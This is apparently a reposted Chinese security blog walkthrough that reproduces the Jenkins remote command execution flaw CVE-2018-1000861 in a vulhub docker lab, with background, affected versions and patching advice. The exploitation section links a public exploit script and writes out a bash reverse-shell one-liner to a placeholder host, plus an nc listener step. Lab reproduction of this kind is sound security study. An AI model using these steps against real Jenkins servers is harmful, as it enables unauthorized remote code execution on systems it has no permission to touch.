Jenkins远程命令执行漏洞
2020-12-23 21:10:08 Author: www.freebuf.com(查看原文) 阅读量:112 收藏

0x00简介

Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。

0x01漏洞概述

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。通过这个漏洞,可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

0x02影响范围

2.153 and earlier

LTS 2.138.3 and earlier

0x03环境搭建

1. 本次实验靶场使用vulhub中docker搭建,vulhub下载地址:

https://github.com/vulhub/vulhub

2. 然后在虚拟机中安装docker,以及安装docker-compose命令,安装方法请自行百度

3. 下载完成后传入安装了虚拟机,然后进入相关漏洞目录

cd vulhub-master/jenkins/CVE-2018-1000861/


4.使用docker-compose up -d运行漏洞环境


5. 环境启动后,访问http://your-ip:8080即可看到一个已经成功初始化的Jenkins


0x04漏洞复现

1. 使用一下命令查看目标的版本

curl -s -I http://your-ip:8080|grep X-Jenkins


2.由于此漏洞是没有回显的,这里使用GitHub上漏exp执行命令。注:也可使用burp抓包执行

exp下载地址:https://github.com/orangetw/awesome-jenkins-rce-2019

下载完成后使用python2执行检查漏洞python2 exp.py http://your-ip:8080 “curl dnslog ”



3.由于此漏洞没有回显,这里直接反弹shell //注:反弹shell需要base64加密

bash -i >& /dev/tcp/your-ip/port 0>&1

base64加密网址:http://www.jackson-t.ca/runtime-exec-payloads.html


3.1然后在nc上监听shell的ip和端口,使用exp发送加密后的shell



小结

1. 本次漏洞复现需要使用到docker环境,需要会用docker基本命令

2. 需要使用到linux相关的命令,以及linux反弹shell的语法

0x05修复建议

1.升级到最新版本或打上相关补丁

2.尽量不要开放到公网上

3.限制IP访问


文章来源: https://www.freebuf.com/vuls/258694.html
如有侵权请联系:admin#unsafe.sh